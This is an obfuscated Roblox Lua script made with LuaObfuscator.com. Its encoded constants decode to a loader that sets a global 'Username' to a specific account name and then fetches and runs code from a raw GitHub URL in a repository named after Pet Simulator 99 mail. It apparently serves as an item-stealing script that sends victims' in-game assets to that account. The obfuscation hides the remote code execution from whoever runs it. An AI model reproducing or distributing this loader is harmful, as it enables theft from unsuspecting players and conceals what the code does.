--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v30=nil;function v30(v31,v32,v33)local v34=v31[1];local v35=v31[2];local v36=v31[3];return function(...)local v67=v34;local v68=v35;local v69=v36;local v70=v28;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v81=0,v75 do if (v81>=v69) then v73[v81-v69 ]=v74[v81 + 1 ];else v77[v81]=v74[v81 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v82=0;while true do if (0==v82) then v79=v67[v71];v80=v79[1];v82=1;end if (1==v82) then if (v80<=5) then if (v80<=2) then if (v80<=0) then local v98=0;local v99;while true do if (v98==0) then v99=v79[2];v77[v99]=v77[v99](v13(v77,v99 + 1 ,v72));break;end end elseif (v80==1) then local v105=0;local v106;local v107;local v108;local v109;local v110;while true do if (v105==2) then if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v33;else v77[v79[2]]=v33[v79[3]];end v71=v71 + 1 ;v79=v67[v71];v110=v79[2];v109=v77[v79[3]];v105=3;end if (v105==5) then v106=0;for v172=v110,v72 do v106=v106 + 1 ;v77[v172]=v107[v106];end v71=v71 + 1 ;v79=v67[v71];v110=v79[2];v105=6;end if (v105==6) then v77[v110]=v77[v110](v13(v77,v110 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v105=7;end if (v105==1) then v71=v71 + 1 ;v79=v67[v71];if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v33;else v77[v79[2]]=v33[v79[3]];end v71=v71 + 1 ;v79=v67[v71];v105=2;end if (v105==3) then v77[v110 + 1 ]=v109;v77[v110]=v109[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v105=4;end if (v105==0) then v106=nil;v107,v108=nil;v109=nil;v110=nil;v33[v79[3]]=v77[v79[2]];v105=1;end if (v105==4) then v71=v71 + 1 ;v79=v67[v71];v110=v79[2];v107,v108=v70(v77[v110](v13(v77,v110 + 1 ,v79[3])));v72=(v108 + v110) -1 ;v105=5;end if (v105==7) then v79=v67[v71];v71=v79[3];break;end end elseif ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v33;else v77[v79[2]]=v33[v79[3]];end elseif (v80<=3) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80==4) then v77[v79[2]]=v79[3];else local v114=0;local v115;local v116;while true do if (v114==1) then v77[v115 + 1 ]=v116;v77[v115]=v116[v79[4]];break;end if (v114==0) then v115=v79[2];v116=v77[v79[3]];v114=1;end end end elseif (v80<=8) then if (v80<=6) then for v100=v79[2],v79[3] do v77[v100]=nil;end elseif (v80>7) then v33[v79[3]]=v77[v79[2]];else local v119=0;local v120;local v121;local v122;local v123;while true do if (v119==2) then for v175=v120,v72 do local v176=0;while true do if (v176==0) then v123=v123 + 1 ;v77[v175]=v121[v123];break;end end end break;end if (v119==1) then v72=(v122 + v120) -1 ;v123=0;v119=2;end if (v119==0) then v120=v79[2];v121,v122=v70(v77[v120](v13(v77,v120 + 1 ,v79[3])));v119=1;end end end elseif (v80<=9) then v77[v79[2]]();elseif (v80>10) then v71=v79[3];else do return;end end v71=v71 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end if (v18==2) then function v23()local v37,v38=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v38 * (493 -237)) + v37 ;end v24=nil;function v24()local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if (v39==((558 + 62) -((790 -235) + 64))) then return (v43 * (16778147 -(857 + 74))) + (v42 * (66104 -(367 + 201))) + (v41 * (1183 -(214 + 713))) + v40 ;end if (v39==(0 + 0)) then v40,v41,v42,v43=v1(v16,v19,v19 + 1 + (1067 -(68 + 997)) );v19=v19 + (881 -(282 + 595)) ;v39=1638 -(1523 + 114) ;end end end v25=nil;v18=3;end if (v18==3) then function v25()local v44=v24();local v45=v24();local v46=1271 -((409 -183) + 1044) ;local v47=(v21(v45,4 -3 ,137 -(32 + 62 + 23) ) * ((2 + 0)^((1005 -(915 + 82)) + 24))) + v44 ;local v48=v21(v45,21,988 -(892 + 65) );local v49=((v21(v45,75 -43 )==1) and  -(1 -0)) or (1 -0) ;if (v48==0) then if (v47==(350 -(87 + 263))) then return v49 * 0 ;else v48=181 -((189 -122) + 113) ;v46=0 + 0 + 0 ;end elseif (v48==(5025 -2978)) then return ((v47==(0 + 0)) and (v49 * (((3 -0) -(1189 -(1069 + 118)))/0))) or (v49 * NaN) ;end return v8(v49,v48-(1975 -(802 + 150)) ) * (v46 + (v47/((5 -3)^52))) ;end v26=nil;function v26(v50)local v51=0 -0 ;local v52;local v53;while true do if (v51==((9 -6) -1)) then v53={};for v91=1 + 0 , #v52 do v53[v91]=v2(v1(v3(v52,v91,v91)));end v51=4 -1 ;end if (v51==(3 + 0)) then return v6(v53);end if (v51==(791 -(368 + 423))) then v52=nil;if  not v50 then v50=v24();if (v50==(0 -0)) then return "";end end v51=1;end if (v51==(19 -(10 + 8))) then v52=v3(v16,v19,(v19 + v50) -(3 -2) );v19=v19 + v50 ;v51=444 -(416 + 26) ;end end end v27=v24;v18=4;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54)if (v1(v54,2)==79) then local v83=0;while true do if (v83==0) then v20=v0(v3(v54,1,1));return "";end end else local v84=v2(v0(v54,16));if v20 then local v93=v5(v84,v20);v20=nil;return v93;else return v84;end end end);v21=nil;v18=1;end if (v18==1) then function v21(v55,v56,v57)if v57 then local v85=(v55/((1 + 1)^(v56-(1 -(0 + 0)))))%((440 -(145 + 293))^(((v57-(431 -((160 -116) + 386))) -(v56-((5280 -3793) -(998 + (1347 -(814 + 45)))))) + 1 + 0)) ;return v85-(v85%(1 + 0)) ;else local v86=2^(v56-(773 -(201 + (1406 -835)))) ;return (((v55%(v86 + v86))>=v86) and (1139 -(7 + 109 + 1022))) or (0 -0) ;end end v22=nil;function v22()local v58=v1(v16,v19,v19);v19=v19 + 1 ;return v58;end v23=nil;v18=2;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v59=0;local v60;local v61;local v62;local v63;local v64;local v65;local v66;while true do if (v59~=(306 -(244 + 60))) then else v64=nil;v65=nil;v59=3;end if (1~=v59) then else v62=nil;v63=nil;v59=1206 -(658 + 546) ;end if (3==v59) then v66=nil;while true do local v94=0 + 0 ;local v95;while true do if (v94~=(0 -0)) then else v95=1251 -(721 + 530) ;while true do if (v95==0) then if ((1002 -(938 + 63))~=v60) then else local v102=1271 -(945 + 326) ;while true do if (v102==2) then v60=4 -2 ;break;end if (v102~=1) then else for v158=1 + 0 ,v65 do local v159=700 -(271 + 429) ;local v160;local v161;local v162;local v163;local v164;while true do if (v159==(1 + 0)) then v162=nil;v163=nil;v159=1502 -(1408 + 92) ;end if ((1140 -(782 + 356))==v159) then v164=nil;while true do if (v160==(1088 -(461 + 625))) then while true do if (v161~=(1288 -(993 + 295))) then else v162=0;v163=nil;v161=1 + 0 ;end if (v161==1) then v164=nil;while true do if (v162~=(1171 -(418 + 753))) then else local v194=0 -0 ;local v195;while true do if (v194==(0 + 0)) then v195=1875 -(157 + 1718) ;while true do if ((0 + 0)==v195) then local v199=0;while true do if (v199~=(0 -0)) then else v163=v22();v164=nil;v199=1;end if (v199~=(3 -2)) then else v195=1 + 0 ;break;end end end if (v195~=(1 + 0)) then else v162=1;break;end end break;end end end if (1==v162) then if (v163==(530 -(406 + 123))) then v164=v22()~=0 ;elseif (v163==(1771 -(1749 + 20))) then v164=v25();elseif (v163==3) then v164=v26();end v66[v158]=v164;break;end end break;end end break;end if (v160~=(0 + 0)) then else v161=1322 -(1249 + 73) ;v162=nil;v160=1 + 0 ;end if (1~=v160) then else local v185=0 -0 ;while true do if (v185==1) then v160=5 -3 ;break;end if (v185==(0 + 0)) then v163=nil;v164=nil;v185=1146 -(466 + 679) ;end end end end break;end if (v159==(1227 -(322 + 905))) then v160=611 -(602 + 9) ;v161=nil;v159=1;end end end v64[3]=v22();v102=2;end if (v102~=0) then else v65=v24();v66={};v102=2 -1 ;end end end if (v60~=2) then else local v103=1189 -(449 + 740) ;while true do if (v103==(2 -1)) then return v64;end if (v103==(947 -(245 + 702))) then for v165=3 -2 ,v24() do local v166=0 + 0 ;local v167;local v168;local v169;while true do if (v166==(1899 -(260 + 1638))) then v169=nil;while true do if (v167~=(441 -(382 + 58))) then else while true do if (v168==0) then v169=v22();if (v21(v169,3 -2 ,1)==0) then local v187=0 + 0 ;local v188;local v189;local v190;local v191;local v192;local v193;while true do if (v187~=(3 -1)) then else v192=nil;v193=nil;v187=1903 -(106 + 1794) ;end if (v187==(8 -5)) then while true do if (v188==(1205 -(902 + 303))) then local v197=0 + 0 ;while true do if ((1 + 0)~=v197) then else v188=1;break;end if (v197~=(0 -0)) then else v189=0;v190=nil;v197=2 -1 ;end end end if ((2 -1)~=v188) then else local v198=0;while true do if ((2 -1)==v198) then v188=116 -(4 + 110) ;break;end if (v198==(584 -(57 + 527))) then v191=nil;v192=nil;v198=1428 -(41 + 1386) ;end end end if (v188~=(105 -(17 + 86))) then else v193=nil;while true do if (v189==2) then while true do if (3==v190) then if (v21(v192,3,3 + 0 )~=1) then else v193[8 -4 ]=v66[v193[11 -7 ]];end v61[v165]=v193;break;end if (v190~=(167 -(122 + 44))) then else local v203=0;local v204;local v205;while true do if (v203~=(683 -(483 + 200))) then else v204=1463 -(1404 + 59) ;v205=nil;v203=1;end if (v203==(1 -0)) then while true do if (v204~=0) then else v205=0 -0 ;while true do if (v205==(3 -2)) then v190=2 + 0 ;break;end if (v205~=0) then else v193={v23(),v23(),nil,nil};if (v191==(0 + 0)) then local v217=0 -0 ;local v218;local v219;local v220;while true do if (v217~=(0 -0)) then else v218=65 -(30 + 35) ;v219=nil;v217=1;end if (v217~=(1 + 0)) then else v220=nil;while true do if (v218~=0) then else local v224=0 + 0 ;while true do if (v224~=(1257 -(1043 + 214))) then else v219=0 -0 ;v220=nil;v224=1213 -(323 + 889) ;end if ((2 -1)~=v224) then else v218=2 -1 ;break;end end end if ((581 -(361 + 219))==v218) then while true do if (v219==0) then v220=320 -(53 + 267) ;while true do if ((0 + 0)==v220) then v193[416 -(15 + 398) ]=v23();v193[986 -(18 + 964) ]=v23();break;end end break;end end break;end end break;end end elseif (v191==(1 + 0)) then v193[11 -8 ]=v24();elseif (v191==(1 + 1)) then v193[4 -1 ]=v24() -((2 + 0)^16) ;elseif (v191~=(768 -(574 + 191))) then else local v225=0 + 0 ;local v226;while true do if (v225==0) then v226=850 -(20 + 830) ;while true do if ((0 + 0)==v226) then v193[2 + 1 ]=v24() -((128 -(116 + 10))^(2 + 14)) ;v193[742 -(542 + 196) ]=v23();break;end end break;end end end v205=1791 -(573 + 1217) ;end end break;end end break;end end end if (v190==2) then local v206=0 -0 ;local v207;while true do if (v206~=(0 + 0)) then else v207=0;while true do if (v207~=(0 + 0)) then else local v214=0;local v215;while true do if (v214~=(0 + 0)) then else v215=0 -0 ;while true do if (v215==0) then local v221=0 -0 ;while true do if ((0 -0)~=v221) then else if (v21(v192,940 -(714 + 225) ,1552 -(1126 + 425) )~=(406 -(118 + 287))) then else v193[1 + 1 ]=v66[v193[7 -5 ]];end if (v21(v192,1123 -(118 + 1003) ,2)==1) then v193[3 -0 ]=v66[v193[809 -(118 + 688) ]];end v221=49 -(25 + 23) ;end if (v221~=(2 -1)) then else v215=378 -(142 + 235) ;break;end end end if (v215==(4 -3)) then v207=1 + 0 ;break;end end break;end end end if (v207~=(978 -(553 + 424))) then else v190=10 -7 ;break;end end break;end end end if (v190==(0 -0)) then local v208=0 + 0 ;local v209;while true do if (v208==(0 + 0)) then v209=97 -(11 + 86) ;while true do if (v209==(1 + 0)) then v190=1 + 0 ;break;end if ((0 + 0)~=v209) then else local v216=0 -0 ;while true do if (v216~=(0 -0)) then else v191=v21(v169,4 -2 ,3);v192=v21(v169,4,2 + 4 );v216=4 -3 ;end if (v216==(754 -(239 + 514))) then v209=1;break;end end end end break;end end end end break;end if (v189~=(0 -0)) then else local v200=0 + 0 ;while true do if (v200==(1330 -(797 + 532))) then v189=1 + 0 ;break;end if (v200~=(0 + 0)) then else local v210=0 -0 ;while true do if ((1203 -(373 + 829))==v210) then v200=1;break;end if (v210==(731 -(476 + 255))) then v190=0;v191=nil;v210=1;end end end end end if (v189~=(1131 -(369 + 761))) then else local v201=0 + 0 ;while true do if ((0 -0)~=v201) then else local v211=0 -0 ;while true do if (v211==(238 -(64 + 174))) then v192=nil;v193=nil;v211=1 + 0 ;end if (v211==(1 -0)) then v201=1 + 0 ;break;end end end if (v201~=1) then else v189=2;break;end end end end break;end end break;end if (v187==0) then v188=336 -(144 + 192) ;v189=nil;v187=217 -(42 + 174) ;end if (v187==(1 + 0)) then v190=nil;v191=nil;v187=735 -(711 + 22) ;end end end break;end end break;end if (0~=v167) then else local v186=0 + 0 ;while true do if ((1 + 0)~=v186) then else v167=1505 -(363 + 1141) ;break;end if (v186~=0) then else v168=1580 -(1183 + 397) ;v169=nil;v186=860 -(240 + 619) ;end end end end break;end if (v166~=(0 -0)) then else v167=0 + 0 ;v168=nil;v166=1 -0 ;end end end for v170=1 + 0 ,v24() do v62[v170-(1 + 0) ]=v29();end v103=1976 -(1913 + 62) ;end end end v95=1 + 0 ;end if ((2 -1)~=v95) then else if (v60~=(1933 -(565 + 1368))) then else local v104=0;while true do if (v104==1) then v63={};v64={v61,v62,nil,v63};v104=2;end if (v104~=(2 + 0)) then else v60=1 -0 ;break;end if (v104==(0 + 0)) then local v131=0 -0 ;while true do if (v131~=(856 -(564 + 292))) then else v61={};v62={};v131=1740 -(404 + 1335) ;end if (v131==(1 -0)) then v104=1;break;end end end end end break;end end break;end end end break;end if (v59~=(0 -0)) then else v60=0;v61=nil;v59=2 -1 ;end end end v18=5;end end end v15("LOL!073O00028O0003083O00557365726E616D65030B3O0041686D6164313437333835030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012043O00014O0006000100013O0026033O00020001000100040B3O00020001001204000100013O002603000100050001000100040B3O00050001001204000200033O001201000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000300056O00023O00024O00020001000100044O0014000100040B3O0005000100040B3O0014000100040B3O000200012O000A3O00017O00",v9(),...);
